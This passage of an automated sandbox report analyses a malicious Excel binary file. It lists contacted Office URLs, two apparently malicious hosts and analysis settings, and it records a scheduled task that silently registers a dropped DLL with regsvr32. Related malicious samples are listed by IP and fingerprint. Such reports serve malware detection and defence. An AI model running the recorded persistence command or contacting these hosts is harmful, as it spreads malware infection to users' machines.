              https://api.diagnosticssdf.office.com2931D31E-E476-4A7B-8B64-97D46D540C47.0.drfalse
                high
                https://login.microsoftonline.com/2931D31E-E476-4A7B-8B64-97D46D540C47.0.drfalse
                  high
                  https://shell.suite.office.com:14432931D31E-E476-4A7B-8B64-97D46D540C47.0.drfalse
                    high
                    https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize2931D31E-E476-4A7B-8B64-97D46D540C47.0.drfalse
                      high
                      https://autodiscover-s.outlook.com/2931D31E-E476-4A7B-8B64-97D46D540C47.0.drfalse
                        high
                        https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr2931D31E-E476-4A7B-8B64-97D46D540C47.0.drfalse
                          high
                          https://cdn.entity.2931D31E-E476-4A7B-8B64-97D46D540C47.0.drfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          unknown
                          https://api.addins.omex.office.net/appinfo/query2931D31E-E476-4A7B-8B64-97D46D540C47.0.drfalse
                            high
                            https://clients.config.office.net/user/v1.0/tenantassociationkey2931D31E-E476-4A7B-8B64-97D46D540C47.0.drfalse
                              high
                              https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/2931D31E-E476-4A7B-8B64-97D46D540C47.0.drfalse
                                high
                                https://powerlift.acompli.net2931D31E-E476-4A7B-8B64-97D46D540C47.0.drfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown
                                https://rpsticket.partnerservices.getmicrosoftkey.com2931D31E-E476-4A7B-8B64-97D46D540C47.0.drfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown
                                https://lookup.onenote.com/lookup/geolocation/v12931D31E-E476-4A7B-8B64-97D46D540C47.0.drfalse
                                  high
                                  https://cortana.ai2931D31E-E476-4A7B-8B64-97D46D540C47.0.drfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech2931D31E-E476-4A7B-8B64-97D46D540C47.0.drfalse
                                    high
                                    https://cloudfiles.onenote.com/upload.aspx2931D31E-E476-4A7B-8B64-97D46D540C47.0.drfalse
                                      high
                                      https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile2931D31E-E476-4A7B-8B64-97D46D540C47.0.drfalse
                                        high
                                        https://entitlement.diagnosticssdf.office.com2931D31E-E476-4A7B-8B64-97D46D540C47.0.drfalse
                                          high
                                          https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy2931D31E-E476-4A7B-8B64-97D46D540C47.0.drfalse
                                            high
                                            https://api.aadrm.com/2931D31E-E476-4A7B-8B64-97D46D540C47.0.drfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            unknown
                                            https://ofcrecsvcapi-int.azurewebsites.net/2931D31E-E476-4A7B-8B64-97D46D540C47.0.drfalse
                                            • 0%, Virustotal, Browse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies2931D31E-E476-4A7B-8B64-97D46D540C47.0.drfalse
                                              high
                                              https://api.microsoftstream.com/api/2931D31E-E476-4A7B-8B64-97D46D540C47.0.drfalse
                                                high
                                                https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive2931D31E-E476-4A7B-8B64-97D46D540C47.0.drfalse
                                                  high
                                                  https://cr.office.com2931D31E-E476-4A7B-8B64-97D46D540C47.0.drfalse
                                                    high
                                                    https://portal.office.com/account/?ref=ClientMeControl2931D31E-E476-4A7B-8B64-97D46D540C47.0.drfalse
                                                      high
                                                      https://graph.ppe.windows.net2931D31E-E476-4A7B-8B64-97D46D540C47.0.drfalse
                                                        high
                                                        https://res.getmicrosoftkey.com/api/redemptionevents2931D31E-E476-4A7B-8B64-97D46D540C47.0.drfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://powerlift-frontdesk.acompli.net2931D31E-E476-4A7B-8B64-97D46D540C47.0.drfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://tasks.office.com2931D31E-E476-4A7B-8B64-97D46D540C47.0.drfalse
                                                          high
                                                          https://officeci.azurewebsites.net/api/2931D31E-E476-4A7B-8B64-97D46D540C47.0.drfalse
                                                          • 0%, Virustotal, Browse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://sr.outlook.office.net/ws/speech/recognize/assistant/work2931D31E-E476-4A7B-8B64-97D46D540C47.0.drfalse
                                                            high
                                                            https://store.office.cn/addinstemplate2931D31E-E476-4A7B-8B64-97D46D540C47.0.drfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            unknown
                                                            https://outlook.office.com/autosuggest/api/v1/init?cvid=2931D31E-E476-4A7B-8B64-97D46D540C47.0.drfalse
                                                              high
                                                              https://globaldisco.crm.dynamics.com2931D31E-E476-4A7B-8B64-97D46D540C47.0.drfalse
                                                                high
                                                                https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech2931D31E-E476-4A7B-8B64-97D46D540C47.0.drfalse
                                                                  high
                                                                  https://store.officeppe.com/addinstemplate2931D31E-E476-4A7B-8B64-97D46D540C47.0.drfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  https://dev0-api.acompli.net/autodetect2931D31E-E476-4A7B-8B64-97D46D540C47.0.drfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  https://www.odwebp.svc.ms2931D31E-E476-4A7B-8B64-97D46D540C47.0.drfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  https://api.powerbi.com/v1.0/myorg/groups2931D31E-E476-4A7B-8B64-97D46D540C47.0.drfalse
                                                                    high
                                                                    https://web.microsoftstream.com/video/2931D31E-E476-4A7B-8B64-97D46D540C47.0.drfalse
                                                                      high
                                                                      https://graph.windows.net2931D31E-E476-4A7B-8B64-97D46D540C47.0.drfalse
                                                                        high
                                                                        https://dataservice.o365filtering.com/2931D31E-E476-4A7B-8B64-97D46D540C47.0.drfalse
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        https://officesetup.getmicrosoftkey.com2931D31E-E476-4A7B-8B64-97D46D540C47.0.drfalse
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        https://analysis.windows.net/powerbi/api2931D31E-E476-4A7B-8B64-97D46D540C47.0.drfalse
                                                                          high
                                                                          https://prod-global-autodetect.acompli.net/autodetect2931D31E-E476-4A7B-8B64-97D46D540C47.0.drfalse
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          unknown
                                                                          https://outlook.office365.com/autodiscover/autodiscover.json2931D31E-E476-4A7B-8B64-97D46D540C47.0.drfalse
                                                                            high
                                                                            https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios2931D31E-E476-4A7B-8B64-97D46D540C47.0.drfalse
                                                                              high
                                                                              https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech2931D31E-E476-4A7B-8B64-97D46D540C47.0.drfalse
                                                                                high
                                                                                https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json2931D31E-E476-4A7B-8B64-97D46D540C47.0.drfalse
                                                                                  high
                                                                                  https://ncus.contentsync.2931D31E-E476-4A7B-8B64-97D46D540C47.0.drfalse
                                                                                  • URL Reputation: safe
                                                                                  • URL Reputation: safe
                                                                                  • URL Reputation: safe
                                                                                  • URL Reputation: safe
                                                                                  unknown
                                                                                  https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false2931D31E-E476-4A7B-8B64-97D46D540C47.0.drfalse
                                                                                    high
                                                                                    https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/2931D31E-E476-4A7B-8B64-97D46D540C47.0.drfalse
                                                                                      high
                                                                                      http://weather.service.msn.com/data.aspx2931D31E-E476-4A7B-8B64-97D46D540C47.0.drfalse
                                                                                        high
                                                                                        https://apis.live.net/v5.0/2931D31E-E476-4A7B-8B64-97D46D540C47.0.drfalse
                                                                                        • URL Reputation: safe
                                                                                        • URL Reputation: safe
                                                                                        • URL Reputation: safe
                                                                                        • URL Reputation: safe
                                                                                        unknown
                                                                                        https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks2931D31E-E476-4A7B-8B64-97D46D540C47.0.drfalse
                                                                                          high
                                                                                          https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios2931D31E-E476-4A7B-8B64-97D46D540C47.0.drfalse
                                                                                            high
                                                                                            https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml2931D31E-E476-4A7B-8B64-97D46D540C47.0.drfalse
                                                                                              high
                                                                                              https://management.azure.com2931D31E-E476-4A7B-8B64-97D46D540C47.0.drfalse
                                                                                                high
                                                                                                https://wus2.contentsync.2931D31E-E476-4A7B-8B64-97D46D540C47.0.drfalse
                                                                                                • URL Reputation: safe
                                                                                                • URL Reputation: safe
                                                                                                • URL Reputation: safe
                                                                                                • URL Reputation: safe
                                                                                                unknown
                                                                                                https://incidents.diagnostics.office.com2931D31E-E476-4A7B-8B64-97D46D540C47.0.drfalse
                                                                                                  high
                                                                                                  https://clients.config.office.net/user/v1.0/ios2931D31E-E476-4A7B-8B64-97D46D540C47.0.drfalse
                                                                                                    high
                                                                                                    https://insertmedia.bing.office.net/odc/insertmedia2931D31E-E476-4A7B-8B64-97D46D540C47.0.drfalse
                                                                                                      high
                                                                                                      https://o365auditrealtimeingestion.manage.office.com2931D31E-E476-4A7B-8B64-97D46D540C47.0.drfalse
                                                                                                        high
                                                                                                        https://outlook.office365.com/api/v1.0/me/Activities2931D31E-E476-4A7B-8B64-97D46D540C47.0.drfalse
                                                                                                          high
                                                                                                          https://api.office.net2931D31E-E476-4A7B-8B64-97D46D540C47.0.drfalse
                                                                                                            high
                                                                                                            https://incidents.diagnosticssdf.office.com2931D31E-E476-4A7B-8B64-97D46D540C47.0.drfalse
                                                                                                              high
                                                                                                              https://asgsmsproxyapi.azurewebsites.net/2931D31E-E476-4A7B-8B64-97D46D540C47.0.drfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              unknown
                                                                                                              https://clients.config.office.net/user/v1.0/android/policies2931D31E-E476-4A7B-8B64-97D46D540C47.0.drfalse
                                                                                                                high
                                                                                                                https://entitlement.diagnostics.office.com2931D31E-E476-4A7B-8B64-97D46D540C47.0.drfalse
                                                                                                                  high
                                                                                                                  https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json2931D31E-E476-4A7B-8B64-97D46D540C47.0.drfalse
                                                                                                                    high
                                                                                                                    https://outlook.office.com/2931D31E-E476-4A7B-8B64-97D46D540C47.0.drfalse
                                                                                                                      high
                                                                                                                      https://storage.live.com/clientlogs/uploadlocation2931D31E-E476-4A7B-8B64-97D46D540C47.0.drfalse
                                                                                                                        high
                                                                                                                        https://templatelogging.office.com/client/log2931D31E-E476-4A7B-8B64-97D46D540C47.0.drfalse
                                                                                                                          high
                                                                                                                          https://outlook.office365.com/2931D31E-E476-4A7B-8B64-97D46D540C47.0.drfalse
                                                                                                                            high
                                                                                                                            https://webshell.suite.office.com2931D31E-E476-4A7B-8B64-97D46D540C47.0.drfalse
                                                                                                                              high
                                                                                                                              https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive2931D31E-E476-4A7B-8B64-97D46D540C47.0.drfalse
                                                                                                                                high
                                                                                                                                https://management.azure.com/2931D31E-E476-4A7B-8B64-97D46D540C47.0.drfalse
                                                                                                                                  high
                                                                                                                                  https://login.windows.net/common/oauth2/authorize2931D31E-E476-4A7B-8B64-97D46D540C47.0.drfalse
                                                                                                                                    high
                                                                                                                                    https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile2931D31E-E476-4A7B-8B64-97D46D540C47.0.drfalse
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    unknown
                                                                                                                                    https://graph.windows.net/2931D31E-E476-4A7B-8B64-97D46D540C47.0.drfalse
                                                                                                                                      high
                                                                                                                                      https://api.powerbi.com/beta/myorg/imports2931D31E-E476-4A7B-8B64-97D46D540C47.0.drfalse
                                                                                                                                        high
                                                                                                                                        https://devnull.onenote.com2931D31E-E476-4A7B-8B64-97D46D540C47.0.drfalse
                                                                                                                                          high
                                                                                                                                          https://ncus.pagecontentsync.2931D31E-E476-4A7B-8B64-97D46D540C47.0.drfalse
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          unknown
                                                                                                                                          https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json2931D31E-E476-4A7B-8B64-97D46D540C47.0.drfalse
                                                                                                                                            high
                                                                                                                                            https://messaging.office.com/2931D31E-E476-4A7B-8B64-97D46D540C47.0.drfalse
                                                                                                                                              high
                                                                                                                                              https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile2931D31E-E476-4A7B-8B64-97D46D540C47.0.drfalse
                                                                                                                                                high
                                                                                                                                                https://augloop.office.com/v22931D31E-E476-4A7B-8B64-97D46D540C47.0.drfalse
                                                                                                                                                  high
                                                                                                                                                  https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing2931D31E-E476-4A7B-8B64-97D46D540C47.0.drfalse
                                                                                                                                                    high
                                                                                                                                                    https://skyapi.live.net/Activity/2931D31E-E476-4A7B-8B64-97D46D540C47.0.drfalse
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    unknown
                                                                                                                                                    https://clients.config.office.net/user/v1.0/mac2931D31E-E476-4A7B-8B64-97D46D540C47.0.drfalse
                                                                                                                                                      high
                                                                                                                                                      https://dataservice.o365filtering.com2931D31E-E476-4A7B-8B64-97D46D540C47.0.drfalse
                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                      unknown
                                                                                                                                                      https://api.cortana.ai2931D31E-E476-4A7B-8B64-97D46D540C47.0.drfalse
                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                      unknown
                                                                                                                                                      https://onedrive.live.com2931D31E-E476-4A7B-8B64-97D46D540C47.0.drfalse
                                                                                                                                                        high
                                                                                                                                                        https://ovisualuiapp.azurewebsites.net/pbiagave/2931D31E-E476-4A7B-8B64-97D46D540C47.0.drfalse
                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                        unknown
                                                                                                                                                        https://visio.uservoice.com/forums/368202-visio-on-devices2931D31E-E476-4A7B-8B64-97D46D540C47.0.drfalse
                                                                                                                                                          high
                                                                                                                                                          https://directory.services.2931D31E-E476-4A7B-8B64-97D46D540C47.0.drfalse
                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                          unknown
                                                                                                                                                          https://login.windows-ppe.net/common/oauth2/authorize2931D31E-E476-4A7B-8B64-97D46D540C47.0.drfalse
                                                                                                                                                            high
                                                                                                                                                            https://staging.cortana.ai2931D31E-E476-4A7B-8B64-97D46D540C47.0.drfalse
                                                                                                                                                            • URL Reputation: safe
                                                                                                                                                            • URL Reputation: safe
                                                                                                                                                            • URL Reputation: safe
                                                                                                                                                            unknown
                                                                                                                                                            https://loki.delve.office.com/api/v1/configuration/officewin32/2931D31E-E476-4A7B-8B64-97D46D540C47.0.drfalse
                                                                                                                                                              high

                                                                                                                                                              Contacted IPs

                                                                                                                                                              • No. of IPs < 25%
                                                                                                                                                              • 25% < No. of IPs < 50%
                                                                                                                                                              • 50% < No. of IPs < 75%
                                                                                                                                                              • 75% < No. of IPs

                                                                                                                                                              Public

                                                                                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                              43.225.55.182
                                                                                                                                                              shadiinfo.comUnited Arab Emirates
                                                                                                                                                              394695PUBLIC-DOMAIN-REGISTRYUSfalse
                                                                                                                                                              192.185.33.154
                                                                                                                                                              treasurechestcaribbean.comUnited States
                                                                                                                                                              46606UNIFIEDLAYER-AS-1USfalse

                                                                                                                                                              General Information

                                                                                                                                                              Joe Sandbox Version:32.0.0 Black Diamond
                                                                                                                                                              Analysis ID:433122
                                                                                                                                                              Start date:11.06.2021
                                                                                                                                                              Start time:11:01:06
                                                                                                                                                              Joe Sandbox Product:CloudBasic
                                                                                                                                                              Overall analysis duration:0h 8m 15s
                                                                                                                                                              Hypervisor based Inspection enabled:false
                                                                                                                                                              Report type:light
                                                                                                                                                              Sample file name:audit-1133808478.xlsb
                                                                                                                                                              Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                              Number of analysed new started processes analysed:38
                                                                                                                                                              Number of new started drivers analysed:0
                                                                                                                                                              Number of existing processes analysed:0
                                                                                                                                                              Number of existing drivers analysed:0
                                                                                                                                                              Number of injected processes analysed:0
                                                                                                                                                              Technologies:
                                                                                                                                                              • HCA enabled
                                                                                                                                                              • EGA enabled
                                                                                                                                                              • HDC enabled
                                                                                                                                                              • AMSI enabled
                                                                                                                                                              Analysis Mode:default
                                                                                                                                                              Analysis stop reason:Timeout
                                                                                                                                                              Detection:MAL
                                                                                                                                                              Classification:mal100.troj.expl.evad.winXLSB@20/20@2/2
                                                                                                                                                              EGA Information:
                                                                                                                                                              • Successful, ratio: 100%
                                                                                                                                                              HDC Information:
                                                                                                                                                              • Successful, ratio: 80.1% (good quality ratio 75.7%)
                                                                                                                                                              • Quality average: 82.4%
                                                                                                                                                              • Quality standard deviation: 27.5%
                                                                                                                                                              HCA Information:
                                                                                                                                                              • Successful, ratio: 99%
                                                                                                                                                              • Number of executed functions: 0
                                                                                                                                                              • Number of non-executed functions: 0
                                                                                                                                                              Cookbook Comments:
                                                                                                                                                              • Adjust boot time
                                                                                                                                                              • Enable AMSI
                                                                                                                                                              • Found application associated with file extension: .xlsb
                                                                                                                                                              • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                              • Attach to Office via COM
                                                                                                                                                              • Scroll down
                                                                                                                                                              • Close Viewer
                                                                                                                                                              Warnings:
                                                                                                                                                              Show All
                                                                                                                                                              • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, BackgroundTransferHost.exe, WerFault.exe, wermgr.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                                                                                                              • TCP Packets have been reduced to 100
                                                                                                                                                              • Excluded IPs from analysis (whitelisted): 104.43.193.48, 13.64.90.137, 52.109.76.68, 52.109.76.33, 23.218.208.56, 20.50.102.62, 2.20.142.210, 2.20.142.209, 20.54.26.129, 20.82.210.154, 92.122.213.247, 92.122.213.194, 40.126.31.135, 40.126.31.143, 20.190.159.132, 40.126.31.139, 20.190.159.138, 20.190.159.134, 40.126.31.4, 40.126.31.141, 104.42.151.234
                                                                                                                                                              • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, prod-w.nexus.live.com.akadns.net, www.tm.lg.prod.aadmsa.akadns.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, login.live.com, audownload.windowsupdate.nsatc.net, nexus.officeapps.live.com, arc.trafficmanager.net, officeclient.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, skypedataprdcolwus17.cloudapp.net, fs.microsoft.com, prod.configsvc1.live.com.akadns.net, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, www.tm.a.prd.aadg.akadns.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, login.msa.msidentity.com, skypedataprdcolcus15.cloudapp.net, ris.api.iris.microsoft.com, config.officeapps.live.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus16.cloudapp.net, europe.configsvc1.live.com.akadns.net
                                                                                                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                              • Report size exceeded maximum capacity and may have missing behavior information.

                                                                                                                                                              Simulations

                                                                                                                                                              Behavior and APIs

                                                                                                                                                              TimeTypeDescription
                                                                                                                                                              11:02:03API Interceptor1170x Sleep call for process: splwow64.exe modified
                                                                                                                                                              11:02:19Task SchedulerRun new task: hoqmcni path: regsvr32.exe s>-s "C:\Users\user\covi1.dll"

                                                                                                                                                              Joe Sandbox View / Context

                                                                                                                                                              IPs

                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                              43.225.55.182#Ubb38#Uc7ac#Uc778 #Ub300#Ud1b5#Ub839 #Uc2e0#Uc0c1#Uc815#Ubcf4.pdf.exe.exeGet hashmaliciousBrowse
                                                                                                                                                              • www.mytargethub.com/s0h/

                                                                                                                                                              Domains

                                                                                                                                                              No context

                                                                                                                                                              ASN

                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                              UNIFIEDLAYER-AS-1USmy_attach_82862.xlsbGet hashmaliciousBrowse
                                                                                                                                                              • 50.87.220.158
                                                                                                                                                              Fax_Doc#01_5.htmlGet hashmaliciousBrowse
                                                                                                                                                              • 162.241.7.171
                                                                                                                                                              WcCEh3daIE.xlsGet hashmaliciousBrowse
                                                                                                                                                              • 162.241.77.193
                                                                                                                                                              KCTC International Ltd.exeGet hashmaliciousBrowse
                                                                                                                                                              • 192.254.185.244
                                                                                                                                                              lTAPQJikGw.exeGet hashmaliciousBrowse
                                                                                                                                                              • 74.220.199.8
                                                                                                                                                              supply us this product.exeGet hashmaliciousBrowse
                                                                                                                                                              • 50.87.146.199
                                                                                                                                                              #U260e#Ufe0f Zeppelin.com AudioMessage_259-55.HTMGet hashmaliciousBrowse
                                                                                                                                                              • 192.185.74.169
                                                                                                                                                              3arZKnr21W.exeGet hashmaliciousBrowse
                                                                                                                                                              • 192.254.235.195
                                                                                                                                                              6b6zVfqxbk.xlsbGet hashmaliciousBrowse
                                                                                                                                                              • 216.172.184.23
                                                                                                                                                              HM-20210428 HBL.exeGet hashmaliciousBrowse
                                                                                                                                                              • 192.254.180.165
                                                                                                                                                              INQUIRY. ZIP.exeGet hashmaliciousBrowse
                                                                                                                                                              • 50.87.190.227
                                                                                                                                                              audit-78958169.xlsbGet hashmaliciousBrowse
                                                                                                                                                              • 192.185.113.120
                                                                                                                                                              research-1315978726.xlsbGet hashmaliciousBrowse
                                                                                                                                                              • 216.172.184.23
                                                                                                                                                              ExHNIXd73f.exeGet hashmaliciousBrowse
                                                                                                                                                              • 108.167.142.232
                                                                                                                                                              research-2012220787.xlsbGet hashmaliciousBrowse
                                                                                                                                                              • 216.172.184.23
                                                                                                                                                              research-2012220787.xlsbGet hashmaliciousBrowse
                                                                                                                                                              • 216.172.184.23
                                                                                                                                                              viVrtGR9Wg.xlsbGet hashmaliciousBrowse
                                                                                                                                                              • 192.185.113.120
                                                                                                                                                              DEMLwnv0Nt.xlsbGet hashmaliciousBrowse
                                                                                                                                                              • 192.185.113.120
                                                                                                                                                              audit-367497006.xlsbGet hashmaliciousBrowse
                                                                                                                                                              • 192.185.113.120
                                                                                                                                                              analysis-31947858.xlsbGet hashmaliciousBrowse
                                                                                                                                                              • 108.167.156.223
                                                                                                                                                              PUBLIC-DOMAIN-REGISTRYUSFactura PO 1541973.exeGet hashmaliciousBrowse
                                                                                                                                                              • 208.91.199.223
                                                                                                                                                              Urgent Contract Order GH7856648,pdf.exeGet hashmaliciousBrowse
                                                                                                                                                              • 208.91.198.143
                                                                                                                                                              NEW ORDER 112888#.exeGet hashmaliciousBrowse
                                                                                                                                                              • 208.91.199.224
                                                                                                                                                              oRSxZhDFLi.exeGet hashmaliciousBrowse
                                                                                                                                                              • 208.91.199.225
                                                                                                                                                              SAUDI ARAMCO Tender Documents - BOQ and ITB.exeGet hashmaliciousBrowse
                                                                                                                                                              • 208.91.199.223
                                                                                                                                                              0PyeqVfoHGFVl2r.exeGet hashmaliciousBrowse
                                                                                                                                                              • 208.91.199.223
                                                                                                                                                              #U260e#Ufe0f Zeppelin.com AudioMessage_259-55.HTMGet hashmaliciousBrowse
                                                                                                                                                              • 207.174.212.247
                                                                                                                                                              SecuriteInfo.com.MachineLearning.Anomalous.97.15449.exeGet hashmaliciousBrowse
                                                                                                                                                              • 208.91.198.143
                                                                                                                                                              lFccIK78FD.exeGet hashmaliciousBrowse
                                                                                                                                                              • 208.91.198.143
                                                                                                                                                              Order10 06 2021.docGet hashmaliciousBrowse
                                                                                                                                                              • 162.215.241.145
                                                                                                                                                              PO187439.exeGet hashmaliciousBrowse
                                                                                                                                                              • 119.18.54.126
                                                                                                                                                              Urgent Contract Order GH78566484,pdf.exeGet hashmaliciousBrowse
                                                                                                                                                              • 208.91.199.223
                                                                                                                                                              MOQ FOB ORDER.exeGet hashmaliciousBrowse
                                                                                                                                                              • 208.91.199.225
                                                                                                                                                              JK6Ul6IKioPWJ6Y.exeGet hashmaliciousBrowse
                                                                                                                                                              • 208.91.198.143
                                                                                                                                                              ekrrUChjXvng9Vr.exeGet hashmaliciousBrowse
                                                                                                                                                              • 208.91.199.223
                                                                                                                                                              SecuriteInfo.com.Trojan.PackedNET.832.15445.exeGet hashmaliciousBrowse
                                                                                                                                                              • 208.91.198.143
                                                                                                                                                              order 4806125050.xlsxGet hashmaliciousBrowse
                                                                                                                                                              • 208.91.199.223
                                                                                                                                                              Bank Swift.docGet hashmaliciousBrowse
                                                                                                                                                              • 162.215.241.145
                                                                                                                                                              SecuriteInfo.com.Trojan.PackedNET.831.28325.exeGet hashmaliciousBrowse
                                                                                                                                                              • 208.91.199.225
                                                                                                                                                              Trial order 20210609.exeGet hashmaliciousBrowse
                                                                                                                                                              • 208.91.199.224

                                                                                                                                                              JA3 Fingerprints

                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                              37f463bf4616ecd445d4a1937da06e19tXkin8g4sy.exeGet hashmaliciousBrowse
                                                                                                                                                              • 43.225.55.182
                                                                                                                                                              • 192.185.33.154
                                                                                                                                                              xGrfj8RvYg.exeGet hashmaliciousBrowse
                                                                                                                                                              • 43.225.55.182
                                                                                                                                                              • 192.185.33.154
                                                                                                                                                              my_attach_82862.xlsbGet hashmaliciousBrowse
                                                                                                                                                              • 43.225.55.182
                                                                                                                                                              • 192.185.33.154
                                                                                                                                                              document-47-2637.xlsGet hashmaliciousBrowse
                                                                                                                                                              • 43.225.55.182
                                                                                                                                                              • 192.185.33.154
                                                                                                                                                              logo.png.exeGet hashmaliciousBrowse
                                                                                                                                                              • 43.225.55.182
                                                                                                                                                              • 192.185.33.154
                                                                                                                                                              document-47-2637.xlsGet hashmaliciousBrowse
                                                                                                                                                              • 43.225.55.182
                                                                                                                                                              • 192.185.33.154
                                                                                                                                                              Fax_Doc#01_5.htmlGet hashmaliciousBrowse
                                                                                                                                                              • 43.225.55.182
                                                                                                                                                              • 192.185.33.154
                                                                                                                                                              wa71myDkbQ.exeGet hashmaliciousBrowse
                                                                                                                                                              • 43.225.55.182
                                                                                                                                                              • 192.185.33.154
                                                                                                                                                              Current-Status-062021-81197.xlsbGet hashmaliciousBrowse
                                                                                                                                                              • 43.225.55.182
                                                                                                                                                              • 192.185.33.154
                                                                                                                                                              logo.png.exeGet hashmaliciousBrowse
                                                                                                                                                              • 43.225.55.182
                                                                                                                                                              • 192.185.33.154
                                                                                                                                                              3F97s4aQjB.xlsxGet hashmaliciousBrowse
                                                                                                                                                              • 43.225.55.182
                                                                                                                                                              • 192.185.33.154
                                                                                                                                                              WcCEh3daIE.xlsGet hashmaliciousBrowse
                                                                                                                                                              • 43.225.55.182
                                                                                                                                                              • 192.185.33.154
                                                                                                                                                              ATT00005.htmGet hashmaliciousBrowse
                                                                                                                                                              • 43.225.55.182
                                                                                                                                                              • 192.185.33.154
                                                                                                                                                              kxjeAvsg1v.exeGet hashmaliciousBrowse
                                                                                                                                                              • 43.225.55.182
                                                                                                                                                              • 192.185.33.154
                                                                                                                                                              VSA75RUmYZ.exeGet hashmaliciousBrowse
                                                                                                                                                              • 43.225.55.182
                                                                                                                                                              • 192.185.33.154
                                                                                                                                                              iX22xMeXIc.exeGet hashmaliciousBrowse
                                                                                                                                                              • 43.225.55.182
